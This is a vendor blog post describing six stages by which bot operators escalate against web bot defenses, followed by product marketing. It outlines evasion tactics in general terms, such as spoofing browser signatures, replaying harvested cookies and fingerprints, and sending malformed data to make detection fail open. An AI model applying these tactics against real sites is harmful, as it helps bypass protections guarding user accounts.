The dynamic of bot attacks
A wealth of information, personal data, and services are available online. On average, Google processes over 40,000 searches every second. If in need of information, one now checks the web before considering paying a visit to the nearest library. Social media and publicly available data has made it easier than ever to gather information about individuals. We no longer need to go out to buy essentials or to manage finances. As more and more businesses move online, more opportunities become available to attackers. I’ve worked in defending sites against automated human attacks for over 10 years and although the techniques used to defend businesses have significantly evolved, so have the attack methods.
Back in the day, rate control, blacklists, and a handful of nicely crafted rules was pretty much all you needed to successfully defend against attacks. Surprisingly, these techniques can actually still work, but not for long.
Let me explain: The sophistication of the attack is typically proportional to the defense in place, but also to the value of the data or goods collected as a result of a successful attack. If a site has no protection in place, an attacker has no incentive to deploy a more costly botnet spanning thousands of nodes in multiple continents with techniques designed to defeat bot detection. In this case, a simple curl script from a single machine will do.
However, as soon as the site administrator starts to put some defenses in place, the game is on and things can evolve rapidly! Having worked for a couple of vendors who offer bot detection products and having traded information with other vendors in the space, the way an attack evolves is typically the same.
Recommended eBook: The Ultimate Guide to Bot Prevention
The six stages of a bot attack
Bot detection has advanced to become more modern and sophisticated against automated attacks. Cybercriminals continuously study defense mechanisms that allow large-scale attack attempts. The stages of a bot attack, launched by a bad actor, typically follow these stages.
Stage 1: Introduction of a web security product. At this stage, the site administrator updates the workflow of their most critical endpoint and introduces a web security product. Existing bots attacking the site will be immediately detected with 100% accuracy simply because most botnets at that stage are scripts that are designed to do a particular task and tailored to follow a given workflow (for example create an account or login). The change introduced into the workflow by the web security product is not part of the default bot script.
Stage 2 - Scaling the botnet and impersonating browsers' signatures. Most basic bot defenses consist of mitigating with rate control, IP blacklist or defining rules that match the bot signature such as the user-agent. To defeat these basic techniques, bot operators will quickly scale their botnet to thousands of nodes. These nodes are hosted in cloud providers spanning several countries. They will also randomize their HTTP header signature (mostly the user-agent).
Stage 3 - Reverse engineering and replay. Of course, as soon as the bot operators realize that the attack continues to fail, they will re-evaluate the workflow. They will look for signs of web security protection and study it. That’s when the time comes for replays. The attacker will identify the type of information that is being collected by the product. They will then update the script to include a “good fingerprint” or try various combinations and randomly change some data points and evaluate the result. If the product uses some sort of persistent ID or cookies, the attacker will also attempt to harvest them from legit sessions and replay them from a botnet.
Stage 4 - Force the web security product to fail open. Failing to defeat the detection through replay, the most persistent attackers will try sending malformed data to see if it triggers some sort of exception. After all, bot operators are all developers and they know that software exceptions can cause the product to “fail safe”. In effect, this will disable the defense. They also know that detection engines don’t have infinite capacity and the fail-safe mechanism may trigger if overwhelmed with traffic. This last option can be a risky bet for the attacker though, as they need to be careful not to overwhelm their target in the process, otherwise it’s game over.
Stage 5 - Upgrade the botnet to a headless browser. Products like Selenium or headless Chrome can be used to build a more intelligent botnet that can run JavaScript. It can be programmed to simulate human behavior all the way to key presses, mouse movements, and clicks.
Stage 6 - Give up the botnet, move on to manual attack. If all attack techniques against the bot detection feature of the product fail, certain types of attacks may still be cost-effective when done manually. More advanced techniques take advantage of IP intelligence, device intelligence, user contextual information, knowledge of sweatshop centers, and behavioral detection methods are required in this case to successfully differentiate between legitimate and suspicious human traffic.
Recommended Case Study: Caffeine.tv Kicks Bots Out of Digital Streaming with Arkose Labs
The bottom line
The detection methods used at each stage work together to differentiate between automated, suspect human, automated/human hybrid, and legitimate human traffic. Challenging all suspicious traffic with the right level of pressure will discourage the bot operator from continuing their attack or make it cost-prohibitive. Each stage of the attack requires an increasing level of skill. Many will give up either because they do not have the expertise, or because the ROI is simply too low and they would rather target an easier, less protected, website, or a website known to be running a legacy captcha solution that hasn’t evolved with attack methods.
Advanced solutions to mitigate attacks
Unlike legacy captcha solutions where data is “black box,”Arkose Bot Manager provides multi-layered detection with real-time insights to improve catch rates and ensure consumers’ account security. It can accurately tell attackers from genuine consumers, quickly adapt to the evolving bot and human-driven attacks, and make more confident response decisions.
Being able to make quick, efficient decisions is imperative in today’s attack landscape where intelligent bots are wreaking havoc, yet many businesses get little to no visibility out of limited signals with legacy solutions like Google reCAPTCHA. Factors like the lack of device spoofing abilities, the absence of distributed crawler detection, basic machine learning models, and no truth data or real-time logging, limit reCAPTCHA’s abilities to spot malicious activity, especially when attackers are becoming more adept at manipulating risk signals.